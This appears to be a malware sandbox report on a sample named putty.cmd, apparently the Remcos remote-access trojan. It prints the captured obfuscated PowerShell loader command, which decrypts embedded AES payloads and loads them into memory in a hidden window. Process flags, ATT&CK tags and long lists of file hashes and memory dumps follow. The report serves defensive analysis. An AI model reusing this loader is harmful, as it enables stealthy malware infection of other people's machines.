C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
5⤵
PID:756

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
5⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3600

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2664

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat
Filesize
144B

MD5
ae66e806d1cac2989b345f48ca269763

SHA1
34ae4b3c126f8cfe9ff3e9a9a81f2d5c6305fe21

SHA256
ff4719815d1fb9c41c99c5491cbed481a51ff9fb036b79c2ea841e7d659f8b18

SHA512
86bd67a1f76d9e394b6f0fd4d2bf08370dbfce266ae14737138257f6fa4b79b5a2075d37c8f7b057d96bb14ea2a42efd82a4527c7341d655d8b69f8dc37cdae8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
1KB

MD5
928d36ad618a369ffebf44885d07cf81

SHA1
edf5a353a919c1873af8e6a0dfafa4c38c626975

SHA256
d3436adbbe4dcb701c214f108dcd7babddbbc1b3b6f6dd6f5a4c5fc8c1a507ea

SHA512
4ca6f5da3cf41f7ea938eaa80e169ed3ba33c93ada8932d2683c5a57e632b963d0cb84bc6330cb1454801f0fbed02f97c8b8c7bbd992c8fdf603220f2be9086a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
19KB

MD5
e90a51d3280c84198517c5118aa4a89e

SHA1
f44d8fb368608e5f36f07b93633805775691edfd

SHA256
113ba962e17e8bd4dd2984397694c21062ad45c4ffc959f3055448f7298f77eb

SHA512
b56895dd1794a991f18b29418decbc4380e010abc23500f89d84a2df7bf771b082f366213d61f4328a231a390771aa1623180f8e071ee8edb998148ac5254394

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
3KB

MD5
d81f7e4ad172f5c9f3c81a3571830a79

SHA1
e5acfc0e153d86c35e8e765951499aa05dad4303

SHA256
0ad988aeda0d9b478ac102493176fe0b9cc8d5c2c03f0b0225ffcf6f9a1125da

SHA512
7a0a702a71440ede9460e1c1e0140d13f6dde9148a42c76218c98f43cb545e27a85f708df483aa8cd657548b427c07540be08585e849436bc763f7c5a54c8666

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
21KB

MD5
48b228d2308ff78543df42c7645fbee6

SHA1
69663117c2bdfeb22e74134f5e92d50628bc7a40

SHA256
36db9c13532927a1751243c3eeb060592a679b0a57211e9251bd58445e64d26d

SHA512
67bce8abf972c3f857e6a5db7bda9a579beea82d91e513da9111f0dbddaa8e77046b04ba2324add75c765fd54de3fe5de8fe1243b827d5c68a7023e21f83c50a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
136B

MD5
a0aaec256da24cd63a9acc43afe6502e

SHA1
82f36283a7296e8e0812439e925f4538cce5ddd3

SHA256
553cf00f9b04b012c825732e7df08fa6ce4cc45fc5db76f399b9f8a39c60626e

SHA512
300ed5416a7a8138d0e0d2115cc0dd37ae66ad3c418a44692c65cb8e27c4d4c68a8971e28e9a766d1696f001756bd11b26b009e6d20bd168fc4ec51e9e8f8f3d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
21KB

MD5
19b830d633135c6b1168755d5f79e1e5

SHA1
0ff875405233f0e46085d5c164c832d9d70ae485

SHA256
c2dfff31aa109a72b4b950f949a56a4754d4f66a29a9872f345cb81b2a777073

SHA512
a100239571569cebae7076241f2824eb7bbf28d87be9bb59375292792a6134d3e391ed1f3f1dcb4799480a2d3073b82906cb16eb43960ada1f3d41004e2fdd7e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
21KB

MD5
f19d51eb144911c746d88bffcd59cd07

SHA1
d1c82462aea7a5c373a1de7afc81f84cef0ec3ba

SHA256
b2f3d1af662ffed2da99163d94e38a7283016a2e18aa5c75648a9cd1d2d8dba9

SHA512
b9959c1db39462f3a92c6679950001f53cbaf164fed284b2bd6f53a773ca76b57514566a41ab88f328cfcb589eee0f12262e01483db70cae2d7d1b5d0ed70a7e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
13KB

MD5
b37810e098a3ffe7abbf707c05ff2f77

SHA1
e097b4ce61605f6d9d133d96bbdd756617c29cf1

SHA256
ba36a4f241afde37e6cef559150ab8d1a8ea70861dd3bf51bf8d893c5f7661c4

SHA512
151bf3f372b4abc7af52646bb16c0aacc24d79388d4e13e613ce989534c8e9d578a092dc1d886a6e0c8d69d6cd1aeeea020a91ead80b689204de47aad59b6953

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
21KB

MD5
5c4eddc4acf40d367d38e6b5bfbbe341

SHA1
135a82173699b95fad461b0f4c43e8d94b2eae4b

SHA256
fbf701b8dc6afc4b143a0dd901e0adaf5e925e4d1e6927f2ab41244d27b3999a

SHA512
d80dbe283f09e755263a9593356a8ec847a5bc3608754cc3f03fe21ce361bc6a2634b6de9c0ee189d9f1e60940ffa7641b4573ff9ce22e10bf6693d556f8c74c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
436B

MD5
304d8fa4c0574321e877b436b36470a5

SHA1
14d1f8f7652cc8a87ae062bb3c442b8f651f9c58

SHA256
50e7236d5e2700c7718c17c8dbb9835ed1ee3faf99291ad22cd275f283eb6d19

SHA512
6992d7039088cc86cbf03f9eb9667286465458a6a47f45a4ea50ffae72f5bfd6644b067dbafa7b21e321ce71067976b9a88400f13dc1978dae29a837060bab81

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
21KB

MD5
3d8bae6c7833298afcf2493cef98d11c

SHA1
b1cae6415fec1fa46d740032e06d66d476a2eaf7

SHA256
71e2b24fa38a2d40563dae0e20b682e26e1e099b26854478da45d0463444b21e

SHA512
3c3aa023f2dbf41e647dbb4d0f71476aa9fe602d193bd0f17e3bba140f949b0b7cf0996771ca370a888dadea5031111281ad008d6ee64704c9a1fbe5d76e4b75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
836B

MD5
7ff9d11f161c8334447e670890cbcc24

SHA1
19e77604a610036c77b536b66ef55e58ccc6fca4

SHA256
66bc987bc355ba7aee4cdf853064e1aea9f2c636b75261f880585495ca6bb66a

SHA512
8f9a44f193b4f872305d48d4b9dee06162b2b0ddec6740e256e5d7010907aa2448c7acc4d20c2d3a839ff586d4221cc9c9db6f9e3efd84a2b16bafd92b4358ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
21KB

MD5
12b28667863bc9412328ae3de35cd959

SHA1
144ea035cbcc7ac2e63077f49bd7dbe1b6e0edf9

SHA256
afd6d5b908baad6dd246a5c7a6507634c34936220b9452b955e22852816c0761

SHA512
6e3da27bb8237d0f8b98d14aabfc32f3e21c184a9836ebf18d6e9fec66b9e2618316475e652b94336211fcf8438e43b40175df164de06109a021f2267844fc15

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
21KB

MD5
1e73801d2f8a0b4de70d64ab96b5c839

SHA1
c5eea4f68bf9329e3c4ee8d6944ce1840dde01cd

SHA256
e27f828f2c70942110807e96013706b8c24a0ec6a69769fa0fe843c933effe95

SHA512
55d62e1d5d05b1fa4eeaefcfe9b45594e36d3bdab1da01ba897cc00de2d5ff83d2fb7133f7c1f61d432a70a9c0d6e87f9ff691dc7c4f23482a3ab813f0798fba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
21KB

MD5
1e50e85568d266ce227c758e9b134a9f

SHA1
a196f1b15e74a1a8af3919862d059cccac8933e4

SHA256
9d901b25e2688e399c40eb87082b7eec61e0770ad461c99bf41bf07401802614

SHA512
072d6593c9ddcedd7a83690045648c75caaf96e5e15ce135514bb1dd64c55d2a6113b2a159970f4a1020514eb3866ce0e25d4196d4c1b71ee987cea411c1cb4a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
21KB

MD5
f3e5b6a256cca5e06887da6a0024b7f3

SHA1
995f4854bb2a4fb3fb3cc254e1e1e8fb0b0fa429

SHA256
6f88382fa3647a796674189ed838ce6d826c604e723365112a0a03af51738e85

SHA512
392f6165a286242331d99b0514e3fe0ca203ec1e00ad491892ae83397737359e471cedb0af9545f6877ba95c9d03dbdf359130bf2290fbb4d6681793b2fb9690

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
3KB

MD5
38cb1155f388a9fb73cfa377b307550b

SHA1
ce936aad63302804fa4ceb91c175d4877bc92e0c

SHA256
43474e9fc0ad7971c1c5204ec256808bbb034c34e0924c4ad4a0b411f9573083

SHA512
cf82a398c793c1e975529d621ae90949d10e946971feefedb53a8e65f7ff5dfdb39d8d01f4460f10dcff2c88834e8c132009a54e93abcbbbcfb0deb1fd48311b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
21KB

MD5
c49ea496cf22852766d021d6c0bf8eec

SHA1
763ee2f93218803f232897d09f9486417e384f7a

SHA256
db339ea03b7d20b201903b5f2d743f6615d4b489f1354a29d998e4baa95f0e2f

SHA512
5fc7177c17c15cfbb3d0754050f5856a725b6133df9d4e07e41e48c90451f308818cbfc4fcc2ee15a3ba899b9e9eb11b27dc6dc70c88be85823078918a980871

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
836B

MD5
3ff4baa446f429ab3005897d1f7a5ef4

SHA1
d75e837ff7487263c7e3c817d405816bee2011da

SHA256
a535429661869f469191186c7808def915d45dac57d4597c3f768a4776df417b

SHA512
0b7de45b5b82667268493e6f02f0218b2acdb0019404ac24e6fa2855ad8800c6ad3fd703e7ea30942560b82ff1233b60287ef587acff7c1fceb814830fca60cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
de3785474ec9f2958bf5ad188157c187

SHA1
d428d28d65ab367cadfa8e92eca5936eb13a8df5

SHA256
456bd22cc0d6f4598966d5cb7b58722b02a0bada4848f973ddfe824b3da09c1f

SHA512
8b9804fff643f4e64510f15aaa2a1f27a24f84bb7511b043c86359ed9bcc19e29baadce4458c753f1661295e2937256eb4a7bccfaf590cd031abcd071ce258ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
c03e0febf2c9a23481c8df79ea38982b

SHA1
c0c5e9036f839fc9cdf8d2466b271a41d7549b8b

SHA256
4cc1454534f596eda878a64f26cad2761e8f4dfa60e958e6da15186df8186351

SHA512
e0940ad8cadcd4626e3c4769e91c31a7b6b97d1d340ddf1570ba9ff25a9b3a09ec3474618b81ffd7276efa8eacb6db1da1f1c164779bc2193a2c58d98241868c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
f7d6b7f3879853a15d7b33686ce21275

SHA1
bf7a40049fda2a4b3fd5db593655c0c8ace529cd

SHA256
c3206f235e90c65decd21d0bae16dd14ce5859011f75636152792d5e74544803

SHA512
004369b7433d82dc2aa1c1336d30c4ee491b14687302cbd5ae09b367c167a956a9de72a703a8e5c20779750256270201dff25638efd458307c66117c8ca52e67

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
bb399bb581675c7a4ea8e6d1b684ea93

SHA1
3b3b187d6d27ba0cf0767296b1d4c442cd121dce

SHA256
6f8ac41385bb99c3fcba58c015a4c2a6c096d0b6a25bbea4dd7375c3e2b64e83

SHA512
dafecabbcb9205438f2ef3d8b0d772e47e228921ee00ee07521847c380b47ed31897b85f383eab76b82fe72098f79e73f6fb5877ac5e775b2b40e8387fca98d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
0d77515bd8002f34051b06cf7c379b56

SHA1
a3db7d58b4af15ef3ad5992ca7e7652e8b46c659

SHA256
04f6fcccfe4ebab90e80137d89b4eb285c90f2c09e502335d87b00918bf5189e

SHA512
3b5f5513d51b5f7718d28819b70bafa76d46806c96ef00692aa571dc1dfbc280e782b5464b16bb3e99682b29c9434c81fa8b2461bde0070af2a5811c1c400037

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
70595b5937369a2592a524db67e208d3

SHA1
d989b934d9388104189f365694e794835aa6f52f

SHA256
be09b93a020e2e86a0b3c7c3f3d3e2c45f888944b1036df738385ede16f595c8

SHA512
edb412886187a2740eb7e284b16838bdd9f011aba1f4581f1fed25a86cdfe9b2ab4df863edeb3db6b072805439d57b10f3e0a1f2daabe1ee56db275ad2ad61e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
26f41cf94fcea0c66fb3304ed9b4a66c

SHA1
e8448d7cb51e93768a3b57d96ab290b2825ba02a

SHA256
c889ab605b2cde9ba5ec49b9d499f2e34c0a63b1861d032a78bfebd215cac289

SHA512
ebccaad97172385c03dda2269a374277e70d04fb450487af6b241aa1d785ef583432b25534021a29b322b8e9396c68553d4b9b27c8b5713f0c070ce19aa83cda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
f1c10b5a8a1723292d7f2497fc0ea413

SHA1
d5008d39de67668cacf974188b9b2a03063a31c5

SHA256
431bb1eb5470b7a2506e73760b9899a72889500004847f2c4d54fdea34562a73

SHA512
7f1e237afc313b3cba6d1b612e28915398f2f82e915fc8bb751890a46b19842bfddc894674980f35d85d6003ba8d20798471b1d5e194a2fa95bb99c0a9a9fc00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
d012c952bd400ef133c6756b4518501d

SHA1
8588b444ccc9f3bdbb31d44c2d34621855f827b9

SHA256
eec8dca20761fcb2f35e36a809f31bdca5a9cdde97cc58f141407f150611edb3

SHA512
9e8b6fc3b15d913dec1af380a91779fe04ba405492465c689ca874c1909bfd3d4d3eed2c67e85120ab3c9c82402638f43534c8755687e6a2cf8d831619c5b9f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
04a8c09199bb86739f38fbcf9ce30a0f

SHA1
3668880a67ade87c97393bc5b274bd5fffeb31c3

SHA256
c8278d1aa4e3b462b1a70de2c18534ec2d6dc9aff5865f3f37138e5d729d8356

SHA512
3205da818ab1b4dea09c063acecbd862c21428f515dd1dace41135e6c5b5e4b9f2022b33752c605a45d201807709c897960030dc5378a58a6dd1201b6feddcd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0pmc4ixn.uhp.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tempScript.ps1
Filesize
1KB

MD5
1449878eb9e0b72365906e10545b3a63

SHA1
27c596b59b6ff8024ba1e47a74a2d11a018315aa

SHA256
dcbee82699901eebd224bf5d350ecd713c947da38e7d4a1dc2be04744dd035c9

SHA512
ed78aa6441f6f5ea160257b19ed1515eb29bc6a05d6bfe887f8776f101028e5cc629387f51223a69876f459fe6af6b472ac595556e952e802746fc0bce329fad

Download Submit
C:\Users\Admin\putty.cmd
Filesize
1.8MB

MD5
fe0b5dd497d401707b5b5cf106ea3d2d

SHA1
cb08bbba87f00576e4ba0bcee4c35fc71fb7306b

SHA256
76b469018e58f53c71dcc049afa38b04854c17e0116d2294a6542cb261a2358f

SHA512
3e4b3f317f6cdc05e34f2b7e65053435f17c71ca79df9c962fac4f19ff8214f0d0df68190bfedbf7fa8e0dbacb9211c3877f5542d1b0bd8e3abdd62439c95521

Download Submit
memory/1112-118-0x0000000074C20000-0x00000000753D0000-memory.dmp

Filesize
7.7MB

Download
memory/1112-92-0x0000000074C20000-0x00000000753D0000-memory.dmp

Filesize
7.7MB

Download
memory/1112-93-0x0000000005020000-0x0000000005030000-memory.dmp

Filesize
64KB

Download
memory/1112-94-0x0000000005020000-0x0000000005030000-memory.dmp

Filesize
64KB

Download
memory/1572-158-0x0000000006330000-0x0000000006684000-memory.dmp

Filesize
3.3MB

Download
memory/1572-147-0x00000000052C0000-0x00000000052D0000-memory.dmp

Filesize
64KB

Download
memory/1572-148-0x0000000074C20000-0x00000000753D0000-memory.dmp

Filesize
7.7MB

Download
memory/1572-177-0x0000000074C20000-0x00000000753D0000-memory.dmp

Filesize
7.7MB

Download
memory/1724-76-0x00007FFF92DA0000-0x00007FFF93861000-memory.dmp

Filesize
10.8MB

Download
memory/1724-131-0x00007FFF92DA0000-0x00007FFF93861000-memory.dmp

Filesize
10.8MB

Download
memory/1724-77-0x000001E7E9B60000-0x000001E7E9B70000-memory.dmp

Filesize
64KB

Download
memory/1724-78-0x000001E7E9B60000-0x000001E7E9B70000-memory.dmp

Filesize
64KB

Download
memory/1888-134-0x00007FFF92DA0000-0x00007FFF93861000-memory.dmp

Filesize
10.8MB

Download
memory/1888-135-0x0000021584050000-0x0000021584060000-memory.dmp

Filesize
64KB

Download
memory/1888-180-0x00007FFF92DA0000-0x00007FFF93861000-memory.dmp

Filesize
10.8MB

Download
memory/1888-141-0x0000021584050000-0x0000021584060000-memory.dmp

Filesize
64KB

Download
memory/2824-20-0x00007FFF92DA0000-0x00007FFF93861000-memory.dmp

Filesize
10.8MB

Download
memory/2824-11-0x00007FFF92DA0000-0x00007FFF93861000-memory.dmp

Filesize
10.8MB

Download
memory/2824-10-0x0000028FE09D0000-0x0000028FE09F2000-memory.dmp

Filesize
136KB

Download
memory/2824-12-0x0000028FE07F0000-0x0000028FE0800000-memory.dmp

Filesize
64KB

Download
memory/2824-13-0x0000028FE07F0000-0x0000028FE0800000-memory.dmp

Filesize
64KB

Download
memory/3600-881-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3632-122-0x0000000074C20000-0x00000000753D0000-memory.dmp

Filesize
7.7MB

Download
memory/3632-105-0x0000000004EB0000-0x0000000004EC0000-memory.dmp

Filesize
64KB

Download
memory/3632-104-0x0000000074C20000-0x00000000753D0000-memory.dmp

Filesize
7.7MB

Download
memory/3632-106-0x0000000004EB0000-0x0000000004EC0000-memory.dmp

Filesize
64KB

Download
memory/3636-79-0x0000000005430000-0x0000000005440000-memory.dmp

Filesize
64KB

Download
memory/3636-80-0x0000000005430000-0x0000000005440000-memory.dmp

Filesize
64KB

Download
memory/3636-81-0x0000000074C20000-0x00000000753D0000-memory.dmp

Filesize
7.7MB

Download
memory/3636-128-0x0000000074C20000-0x00000000753D0000-memory.dmp

Filesize
7.7MB

Download
memory/4272-174-0x0000000074C20000-0x00000000753D0000-memory.dmp

Filesize
7.7MB

Download
memory/4272-163-0x0000000002E70000-0x0000000002E80000-memory.dmp

Filesize
64KB

Download
memory/4272-162-0x0000000002E70000-0x0000000002E80000-memory.dmp

Filesize
64KB

Download
memory/4272-161-0x0000000074C20000-0x00000000753D0000-memory.dmp

Filesize
7.7MB

Download
memory/4400-209-0x0000000074C20000-0x00000000753D0000-memory.dmp

Filesize
7.7MB

Download
memory/4400-222-0x0000000074C20000-0x00000000753D0000-memory.dmp

Filesize
7.7MB

Download
memory/4400-210-0x00000000046B0000-0x00000000046C0000-memory.dmp

Filesize
64KB

Download
memory/4400-211-0x00000000046B0000-0x00000000046C0000-memory.dmp

Filesize
64KB

Download
memory/4836-199-0x0000000005BB0000-0x0000000005F04000-memory.dmp

Filesize
3.3MB

Download
memory/4836-225-0x0000000074C20000-0x00000000753D0000-memory.dmp

Filesize
7.7MB

Download
memory/4836-195-0x0000000074C20000-0x00000000753D0000-memory.dmp

Filesize
7.7MB

Download
memory/4980-184-0x00000264DC750000-0x00000264DC760000-memory.dmp

Filesize
64KB

Download
memory/4980-183-0x00007FFF92DA0000-0x00007FFF93861000-memory.dmp

Filesize
10.8MB

Download
memory/4980-185-0x00000264DC750000-0x00000264DC760000-memory.dmp

Filesize
64KB

Download
memory/4980-228-0x00007FFF92DA0000-0x00007FFF93861000-memory.dmp

Filesize
10.8MB

Download
memory/5052-23-0x00007FFF92DA0000-0x00007FFF93861000-memory.dmp

Filesize
10.8MB

Download
memory/5052-63-0x00007FFF92DA0000-0x00007FFF93861000-memory.dmp

Filesize
10.8MB

Download
memory/5052-30-0x000001B674BC0000-0x000001B674BD0000-memory.dmp

Filesize
64KB

Download
memory/5052-31-0x000001B674BC0000-0x000001B674BD0000-memory.dmp

Filesize
64KB

Download
memory/5100-58-0x0000000006F10000-0x0000000006F86000-memory.dmp

Filesize
472KB

Download
memory/5100-42-0x0000000004D20000-0x0000000004D42000-memory.dmp

Filesize
136KB

Download
memory/5100-56-0x0000000005C60000-0x0000000005CAC000-memory.dmp

Filesize
304KB

Download
memory/5100-55-0x0000000005C10000-0x0000000005C2E000-memory.dmp

Filesize
120KB

Download
memory/5100-54-0x00000000056C0000-0x0000000005A14000-memory.dmp

Filesize
3.3MB

Download
memory/5100-44-0x0000000005590000-0x00000000055F6000-memory.dmp

Filesize
408KB

Download
memory/5100-43-0x0000000005420000-0x0000000005486000-memory.dmp

Filesize
408KB

Download
memory/5100-57-0x0000000006D50000-0x0000000006D94000-memory.dmp

Filesize
272KB

Download
memory/5100-40-0x0000000002380000-0x0000000002390000-memory.dmp

Filesize
64KB

Download
memory/5100-41-0x0000000004DF0000-0x0000000005418000-memory.dmp

Filesize
6.2MB

Download
memory/5100-38-0x0000000002380000-0x0000000002390000-memory.dmp

Filesize
64KB

Download
memory/5100-37-0x0000000074C20000-0x00000000753D0000-memory.dmp

Filesize
7.7MB

Download
memory/5100-36-0x0000000004780000-0x00000000047B6000-memory.dmp

Filesize
216KB

Download
memory/5100-59-0x0000000007610000-0x0000000007C8A000-memory.dmp

Filesize
6.5MB

Download
memory/5100-60-0x0000000006FB0000-0x0000000006FCA000-memory.dmp

Filesize
104KB

Download
memory/5100-125-0x0000000074C20000-0x00000000753D0000-memory.dmp

Filesize
7.7MB

Download